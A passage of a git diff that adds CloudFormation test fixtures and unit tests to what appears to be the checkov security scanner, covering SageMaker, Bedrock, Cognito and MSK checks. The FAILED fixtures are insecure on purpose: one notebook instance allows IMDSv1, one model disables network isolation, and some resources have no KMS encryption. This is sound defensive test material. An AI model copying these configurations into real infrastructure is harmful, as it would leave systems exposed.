+          InstanceCount: 1
+          InstanceType: "ml.m5.xlarge"
+          VolumeSizeInGB: 20
+      StoppingCondition:
+        MaxRuntimeInSeconds: 3600
+
+  MyDataQualityJobDefinitionFail2:
+    Type: "AWS::SageMaker::DataQualityJobDefinition"
+    Properties:
+      JobDefinitionName: "MyDataQualityJob"
+      RoleArn: !GetAtt MySageMakerRole.Arn
+      DataQualityAppSpecification:
+        ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+      DataQualityJobInput:
+        EndpointInput:
+          EndpointName: "my-endpoint"
+          LocalPath: "/opt/ml/processing/input"
+      DataQualityJobOutputConfig:
+        KmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+        MonitoringOutputs:
+          - S3Output:
+              S3Uri: "s3://my-sagemaker-bucket/output"
+              LocalPath: "/opt/ml/processing/output"
+              S3UploadMode: "Continuous"
+      JobResources:
+        ClusterConfig:
+          InstanceCount: 2
+          InstanceType: "ml.m5.xlarge"
+          VolumeSizeInGB: 30
+      StoppingCondition:
+        MaxRuntimeInSeconds: 3600
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-PASSED.yaml
new file mode 100644
index 00000000000..429638d1c63
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/SagemakerDataQualityJobDefinitionVolumeEncryption-PASSED.yaml
@@ -0,0 +1,41 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+  MySageMakerRole:
+    Type: "AWS::IAM::Role"
+    Properties:
+      AssumeRolePolicyDocument:
+        Version: "2012-10-17"
+        Statement:
+          - Effect: "Allow"
+            Principal:
+              Service:
+                - "sagemaker.amazonaws.com"
+            Action:
+              - "sts:AssumeRole"
+
+  MyDataQualityJobDefinitionPass:
+    Type: "AWS::SageMaker::DataQualityJobDefinition"
+    Properties:
+      JobDefinitionName: "MyDataQualityJob"
+      RoleArn: !GetAtt MySageMakerRole.Arn
+      DataQualityAppSpecification:
+        ImageUri: "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+      DataQualityJobInput:
+        EndpointInput:
+          EndpointName: "my-endpoint"
+          LocalPath: "/opt/ml/processing/input"
+      DataQualityJobOutputConfig:
+        KmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+        MonitoringOutputs:
+          - S3Output:
+              S3Uri: "s3://my-sagemaker-bucket/output"
+              LocalPath: "/opt/ml/processing/output"
+              S3UploadMode: "Continuous"
+      JobResources:
+        ClusterConfig:
+          InstanceCount: 1
+          InstanceType: "ml.m5.xlarge"
+          VolumeSizeInGB: 20
+          VolumeKmsKeyId: "arn:aws:kms:us-west-2:123456789012:key/my-existing-volume-kms-key-id"
+      StoppingCondition:
+        MaxRuntimeInSeconds: 3600
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-FAILED.yaml
new file mode 100644
index 00000000000..2ab1d065991
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-FAILED.yaml
@@ -0,0 +1,44 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+  SageMakerExecutionRole:
+    Type: 'AWS::IAM::Role'
+    Properties:
+      RoleName: 'SageMakerExecutionRole'
+      AssumeRolePolicyDocument:
+        Version: '2012-10-17'
+        Statement:
+          - Effect: 'Allow'
+            Principal:
+              Service: 'sagemaker.amazonaws.com'
+            Action: 'sts:AssumeRole'
+      Policies:
+        - PolicyName: 'SageMakerExecutionPolicy'
+          PolicyDocument:
+            Version: '2012-10-17'
+            Statement:
+              - Effect: 'Allow'
+                Action:
+                  - 's3:GetObject'
+                  - 's3:PutObject'
+                Resource: 'arn:aws:s3:::your-s3-bucket-name/*'
+
+  SageMakerModelFail1:
+    Type: 'AWS::SageMaker::Model'
+    Properties:
+      ModelName: 'ExampleSageMakerModel'
+      ExecutionRoleArn: !GetAtt SageMakerExecutionRole.Arn
+      PrimaryContainer:
+        Image: '123456789012.dkr.ecr.us-west-2.amazonaws.com/my-sagemaker-image:latest'
+        Mode: 'SingleModel'
+        ModelDataUrl: 's3://your-s3-bucket-name/model.tar.gz'
+      EnableNetworkIsolation: false
+
+  SageMakerModelFail2:
+    Type: 'AWS::SageMaker::Model'
+    Properties:
+      ModelName: 'ExampleSageMakerModel'
+      ExecutionRoleArn: !GetAtt SageMakerExecutionRole.Arn
+      PrimaryContainer:
+        Image: '123456789012.dkr.ecr.us-west-2.amazonaws.com/my-sagemaker-image:latest'
+        Mode: 'SingleModel'
+        ModelDataUrl: 's3://your-s3-bucket-name/model.tar.gz'
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-PASSED.yaml
new file mode 100644
index 00000000000..8281e944787
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/SagemakerModelWithNetworkIsolation-PASSED.yaml
@@ -0,0 +1,34 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Resources:
+  SageMakerExecutionRole:
+    Type: 'AWS::IAM::Role'
+    Properties:
+      RoleName: 'SageMakerExecutionRole'
+      AssumeRolePolicyDocument:
+        Version: '2012-10-17'
+        Statement:
+          - Effect: 'Allow'
+            Principal:
+              Service: 'sagemaker.amazonaws.com'
+            Action: 'sts:AssumeRole'
+      Policies:
+        - PolicyName: 'SageMakerExecutionPolicy'
+          PolicyDocument:
+            Version: '2012-10-17'
+            Statement:
+              - Effect: 'Allow'
+                Action:
+                  - 's3:GetObject'
+                  - 's3:PutObject'
+                Resource: 'arn:aws:s3:::your-s3-bucket-name/*'
+
+  SageMakerModelPass:
+    Type: 'AWS::SageMaker::Model'
+    Properties:
+      ModelName: 'ExampleSageMakerModel'
+      ExecutionRoleArn: !GetAtt SageMakerExecutionRole.Arn
+      PrimaryContainer:
+        Image: '123456789012.dkr.ecr.us-west-2.amazonaws.com/my-sagemaker-image:latest'
+        Mode: 'SingleModel'
+        ModelDataUrl: 's3://your-s3-bucket-name/model.tar.gz'
+      EnableNetworkIsolation: true
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml
new file mode 100644
index 00000000000..2f2fb8d24cc
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookEncryptedWithCMK/template.yaml
@@ -0,0 +1,38 @@
+Resources:
+  BasicNotebookInstancePASS:
+    Type: "AWS::SageMaker::NotebookInstance"
+    Properties:
+      InstanceType: "ml.t2.large"
+      RoleArn: "!GetAtt ExecutionRole.Arn"
+      KmsKeyId: "bla bla"
+  BasicNotebookInstanceFAIL:
+    Type: "AWS::SageMaker::NotebookInstance"
+    Properties:
+      InstanceType: "ml.t2.large"
+      RoleArn: "!GetAtt ExecutionRole.Arn"
+
+  BasicDomainPASS:
+    Metadata:
+      cfn-lint:
+        config:
+          ignore_checks:
+            - E3002
+            - E3030
+            - E3003
+    Type: "AWS::SageMaker::Domain"
+    Properties:
+      InstanceType: "ml.t2.large"
+      RoleArn: "!GetAtt ExecutionRole.Arn"
+      KmsKeyId: "bla bla"
+  BasicDomainFAIL:
+    Metadata:
+      cfn-lint:
+        config:
+          ignore_checks:
+            - E3002
+            - E3030
+            - E3003
+    Type: "AWS::SageMaker::Domain"
+    Properties:
+      InstanceType: "ml.t2.large"
+      RoleArn: "!GetAtt ExecutionRole.Arn"
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-FAILED.yaml
new file mode 100644
index 00000000000..bffa9cfe003
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-FAILED.yaml
@@ -0,0 +1,31 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Description: "Create basic notebook instance"
+Resources:
+  BasicNotebookInstanceFail1:
+    Type: "AWS::SageMaker::NotebookInstance"
+    Properties:
+      InstanceType: "ml.t2.large"
+      RoleArn: !GetAtt ExecutionRole.Arn
+      InstanceMetadataServiceConfiguration:
+        MinimumInstanceMetadataServiceVersion: "1"
+  BasicNotebookInstanceFail2:
+    Type: "AWS::SageMaker::NotebookInstance"
+    Properties:
+      InstanceType: "ml.t2.large"
+      RoleArn: !GetAtt ExecutionRole.Arn
+  ExecutionRole: 
+    Type: "AWS::IAM::Role"
+    Properties: 
+      AssumeRolePolicyDocument: 
+        Version: "2012-10-17"
+        Statement: 
+          - 
+            Effect: "Allow"
+            Principal: 
+              Service: 
+                - "sagemaker.amazonaws.com"
+            Action: 
+              - "sts:AssumeRole"
+      Path: "/"
+      ManagedPolicyArns:
+        - !Sub "arn:${AWS::Partition}:iam::aws:policy/AmazonSageMakerFullAccess"
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-PASSED.yaml
new file mode 100644
index 00000000000..2a391df2054
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/SagemakerNotebookInstanceAllowsIMDSv2-PASSED.yaml
@@ -0,0 +1,26 @@
+AWSTemplateFormatVersion: '2010-09-09'
+Description: "Create basic notebook instance"
+Resources:
+  BasicNotebookInstancePass:
+    Type: "AWS::SageMaker::NotebookInstance"
+    Properties:
+      InstanceType: "ml.t2.large"
+      RoleArn: !GetAtt ExecutionRole.Arn
+      InstanceMetadataServiceConfiguration:
+        MinimumInstanceMetadataServiceVersion: "2"
+  ExecutionRole: 
+    Type: "AWS::IAM::Role"
+    Properties: 
+      AssumeRolePolicyDocument: 
+        Version: "2012-10-17"
+        Statement: 
+          - 
+            Effect: "Allow"
+            Principal: 
+              Service: 
+                - "sagemaker.amazonaws.com"
+            Action: 
+              - "sts:AssumeRole"
+      Path: "/"
+      ManagedPolicyArns:
+        - !Sub "arn:${AWS::Partition}:iam::aws:policy/AmazonSageMakerFullAccess"
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/test_BedrockAgentEncrypted.py b/tests/cloudformation/checks/resource/aws/test_BedrockAgentEncrypted.py
new file mode 100644
index 00000000000..8debbcb8719
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_BedrockAgentEncrypted.py
@@ -0,0 +1,45 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.BedrockAgentEncrypted import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestBedrockAgentEncrypted(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        test_files_dir = current_dir + "/example_BedrockAgentEncrypted"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        for record in report.failed_checks:
+            self.assertEqual(record.check_id, check.id)
+
+        for record in report.passed_checks:
+            self.assertEqual(record.check_id, check.id)
+
+        passing_resources = {
+            "AWS::Bedrock::Agent.Pass",
+        }
+
+        failing_resources = {
+            "AWS::Bedrock::Agent.Fail",
+
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], 1)
+        self.assertEqual(summary['failed'], 1)
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMCredentialsExposure.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMCredentialsExposure.py
index 8c359481e2f..130c2c603a1 100644
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMCredentialsExposure.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMCredentialsExposure.py
@@ -19,6 +19,8 @@ def test_summary(self):
         self.assertEqual(summary['failed'], 1)
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
+        self.assertIn('Properties/PolicyDocument/Statement/[0]/Action/[0]/', report.failed_checks[0].check_result.get('evaluated_keys'))
+        self.assertIn('Properties/PolicyDocument/Statement/[0]/Action/[2]/', report.failed_checks[0].check_result.get('evaluated_keys'))
 
 
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMGroup.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMGroup.py
index 67071bf62fc..ced1b5e2904 100644
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMGroup.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMGroup.py
@@ -23,6 +23,8 @@ def test_summary(self):
         self.assertEqual(summary['failed'], 2)
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+        self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 
 
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMRole.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMRole.py
index 7ca4d4db0b1..c3c08d19fb1 100644
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMRole.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMRole.py
@@ -23,6 +23,8 @@ def test_summary(self):
         self.assertEqual(summary['failed'], 2)
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+        self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 
 
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMUser.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMUser.py
index 3dd208e9617..b0cc2a3f225 100644
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMUser.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingIAMUser.py
@@ -23,6 +23,8 @@ def test_summary(self):
         self.assertEqual(summary['failed'], 2)
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+        self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 
 
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CloudsplainingManagedPolicy.py b/tests/cloudformation/checks/resource/aws/test_CloudsplainingManagedPolicy.py
index 17a71d0f59c..9af93a0235e 100644
--- a/tests/cloudformation/checks/resource/aws/test_CloudsplainingManagedPolicy.py
+++ b/tests/cloudformation/checks/resource/aws/test_CloudsplainingManagedPolicy.py
@@ -23,6 +23,9 @@ def test_summary(self):
         self.assertEqual(summary['failed'], 3)
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+        self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
+        self.assertEqual(report.failed_checks[2].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 
 
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py b/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py
new file mode 100644
index 00000000000..cdba703f9f7
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py
@@ -0,0 +1,46 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.CognitoUnauthenticatedIdentities import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestCognitoUnauthenticatedIdentities(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_CognitoUnauthenticatedIdentities"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        for record in report.failed_checks:
+            self.assertEqual(record.check_id, check.id)
+        
+        for record in report.passed_checks:
+            self.assertEqual(record.check_id, check.id)
+
+        passing_resources = {
+            "AWS::Cognito::IdentityPool.Pass",
+        }
+
+        failing_resources = {
+            "AWS::Cognito::IdentityPool.Fail",
+
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_ECRPolicy.py b/tests/cloudformation/checks/resource/aws/test_ECRPolicy.py
index 09987b8366c..c618dad1222 100644
--- a/tests/cloudformation/checks/resource/aws/test_ECRPolicy.py
+++ b/tests/cloudformation/checks/resource/aws/test_ECRPolicy.py
@@ -35,6 +35,8 @@ def test_summary(self):
         self.assertEqual(summary['failed'], len(failing_resources))
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'),
+                         ['Properties/RepositoryPolicyText/Statement/[0]/Principal/AWS/[2]/'])
 
         self.assertEqual(passing_resources, passed_check_resources)
         self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
index caaa9dab012..49a069de7a8 100644
--- a/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
+++ b/tests/cloudformation/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
@@ -16,10 +16,25 @@ def test_summary(self):
         report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id]))
         summary = report.get_summary()
 
-        self.assertEqual(summary['passed'], 1)
-        self.assertEqual(summary['failed'], 1)
-        self.assertEqual(summary['skipped'], 0)
-        self.assertEqual(summary['parsing_errors'], 0)
+        passing_resources = {
+            "AWS::ElastiCache::ReplicationGroup.ReplicationGroupPass",
+            "AWS::ElastiCache::ReplicationGroup.ReplicationGroupPass2",
+        }
+        failing_resources = {
+            "AWS::ElastiCache::ReplicationGroup.ReplicationGroupFail",
+            "AWS::ElastiCache::ReplicationGroup.ReplicationGroupFail2",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
 
 
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_IAMPermissionsManagement.py b/tests/cloudformation/checks/resource/aws/test_IAMPermissionsManagement.py
index ec1a5c8646d..507a2c858e3 100644
--- a/tests/cloudformation/checks/resource/aws/test_IAMPermissionsManagement.py
+++ b/tests/cloudformation/checks/resource/aws/test_IAMPermissionsManagement.py
@@ -20,6 +20,9 @@ def test_summary(self):
         self.assertEqual(summary['failed'], 3)
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+        self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
+        self.assertEqual(report.failed_checks[2].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 
 
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_IAMWriteAccess.py b/tests/cloudformation/checks/resource/aws/test_IAMWriteAccess.py
index c53b410efcc..b9c53f5556b 100644
--- a/tests/cloudformation/checks/resource/aws/test_IAMWriteAccess.py
+++ b/tests/cloudformation/checks/resource/aws/test_IAMWriteAccess.py
@@ -20,6 +20,9 @@ def test_summary(self):
         self.assertEqual(summary['failed'], 3)
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
+        self.assertEqual(report.failed_checks[0].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action'])
+        self.assertEqual(report.failed_checks[1].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
+        self.assertEqual(report.failed_checks[2].check_result.get('evaluated_keys'), ['Properties/PolicyDocument/Statement/[0]/Action/[0]/'])
 
 
 if __name__ == '__main__':
diff --git a/tests/cloudformation/checks/resource/aws/test_MSKClusterEncryption.py b/tests/cloudformation/checks/resource/aws/test_MSKClusterEncryption.py
new file mode 100644
index 00000000000..8cc3acafcf3
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_MSKClusterEncryption.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.MSKClusterEncryption import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMSKClusterEncryption(unittest.TestCase):
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_MSKClusterEncryption"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "AWS::MSK::Cluster.MSKClusterPASSTLS",
+        }
+        failing_resources = {
+            "AWS::MSK::Cluster.MSKClusterFAILskip",
+            "AWS::MSK::Cluster.MSKClusterFAILnotTLS",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/test_MSKClusterLogging.py b/tests/cloudformation/checks/resource/aws/test_MSKClusterLogging.py
new file mode 100644
index 00000000000..2798eb2f2e6
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_MSKClusterLogging.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.MSKClusterLogging import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMSKClusterLogging(unittest.TestCase):
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_MSKClusterLogging"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "AWS::MSK::Cluster.MSKClusterPASS",
+            "AWS::MSK::Cluster.MSKClusterPASSskip",
+        }
+        failing_resources = {
+            "AWS::MSK::Cluster.MSKClusterFAILempty",
+            "AWS::MSK::Cluster.MSKClusterFAILdeclared",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/test_MSKClusterNodesArePrivate.py b/tests/cloudformation/checks/resource/aws/test_MSKClusterNodesArePrivate.py
new file mode 100644
index 00000000000..2d58996cf3b
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_MSKClusterNodesArePrivate.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.MSKClusterNodesArePrivate import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMSKClusterNodesArePrivate(unittest.TestCase):
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_MSKClusterNodesArePrivate"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "AWS::MSK::Cluster.MSKClusterPASS",
+            "AWS::MSK::Cluster.MSKClusterPASS2"
+        }
+        failing_resources = {
+            "AWS::MSK::Cluster.MSKCluster",
+            "AWS::MSK::Cluster.MSKCluster2"
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
\ No newline at end of file
diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionEncryption.py b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionEncryption.py
new file mode 100644
index 00000000000..4c99ce775a1
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionEncryption.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.cloudformation.checks.resource.aws.SagemakerDataQualityJobDefinitionEncryption import check
+from checkov.cloudformation.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSagemakerDataQualityJobDefinitionEncryption(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerDataQualityJobDefinitionEncryption"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionPass",
+        }
+        failing_resources = {
+            "AWS::SageMaker::DataQualityJobDefinition.MyDataQualityJobDefinitionFail",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionTrafficEncryption.py b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionTrafficEncryption.py
new file mode 100644
index 00000000000..ca37371329c
--- /dev/null
+++ b/tests/cloudformation/checks/resource/aws/test_SagemakerDataQualityJobDefinitionTrafficEncryption.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
